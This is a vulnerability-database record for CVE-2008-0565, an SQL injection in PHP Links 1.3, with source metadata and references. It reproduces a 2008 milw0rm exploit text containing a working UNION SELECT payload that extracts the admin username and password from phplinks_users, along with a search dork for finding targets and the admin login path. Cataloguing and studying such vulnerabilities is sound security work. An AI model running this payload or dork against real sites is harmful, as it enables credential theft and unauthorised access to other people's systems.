Details of VAR-E-200801-0040

ID

VAR-E-200801-0040

CVE

cve_id:

CVE-2008-0565

Trust: 1.9

sources: BID: 27530 // EXPLOIT-DB: 5021 // EDBNET: 29329

EDB ID

5021

TITLE

PHP Links 1.3 - 'id' SQL Injection - PHP webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 5021

DESCRIPTION

PHP Links 1.3 - 'id' SQL Injection. CVE-41145CVE-2008-0565CVE-40840 . webapps exploit for PHP platform

Trust: 0.6

sources: EXPLOIT-DB: 5021

AFFECTED PRODUCTS

vendor:	php	model:	links	scope:	eq	version:	1.3	Trust: 1.0
vendor:	deltascripts	model:	php links	scope:	eq	version:	1.3	Trust: 0.3

sources: BID: 27530 // EXPLOIT-DB: 5021

EXPLOIT

-------------------------------------------------------------
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo --------
-------------------------------------------------------------

= Author : Houssamix From H-T Team
= Script : PHP Links from DeltaScripts <= 1.3

= Download : http://softadmin.deltascripts.com/download.php
(PHP Links v1.3 Released 13.09.2007 )

= BUG : Remote SQL Injection Vulnerability

= Dork : Powered by PHP Links from DeltaScripts

= Exploit :
vote.php?id=-1%20union%20select%20concat(user_name,0x3a,user_pass),2,3,4,5,6%20from%20phplinks_users%20where%20user_id=1--

= Note : admin login http://Target/path/admin/

-------------------------------------------------------------
= Greetz : CoNaN - Stack-Terrorist - Gold_M - Rachidox
-------------------------------------------------------------

# milw0rm.com [2008-01-30]

Trust: 1.0

sources: EXPLOIT-DB: 5021

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 5021

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 5021

TYPE

'id' SQL Injection

Trust: 1.0

sources: EXPLOIT-DB: 5021

CREDITS

Houssamix

Trust: 0.6

sources: EXPLOIT-DB: 5021

EXTERNAL IDS

db:	NVD	id:	CVE-2008-0565	Trust: 1.9
db:	EXPLOIT-DB	id:	5021	Trust: 1.6
db:	EDBNET	id:	29329	Trust: 0.6
db:	BID	id:	27530	Trust: 0.3

sources: BID: 27530 // EXPLOIT-DB: 5021 // EDBNET: 29329

REFERENCES

url:	https://nvd.nist.gov/vuln/detail/cve-2008-0565	Trust: 1.6
url:	https://www.exploit-db.com/exploits/5021/	Trust: 0.6
url:	http://www.deltascripts.com/phplinks	Trust: 0.3

sources: BID: 27530 // EXPLOIT-DB: 5021 // EDBNET: 29329

SOURCES

db:	BID	id:	27530
db:	EXPLOIT-DB	id:	5021
db:	EDBNET	id:	29329

LAST UPDATE DATE

2022-07-27T09:20:15.359000+00:00

SOURCES UPDATE DATE

db:

BID

id:

27530

date:

2015-05-07T17:33:00

SOURCES RELEASE DATE

db:	BID	id:	27530	date:	2008-01-30T00:00:00
db:	EXPLOIT-DB	id:	5021	date:	2008-01-30T00:00:00
db:	EDBNET	id:	29329	date:	2008-01-30T00:00:00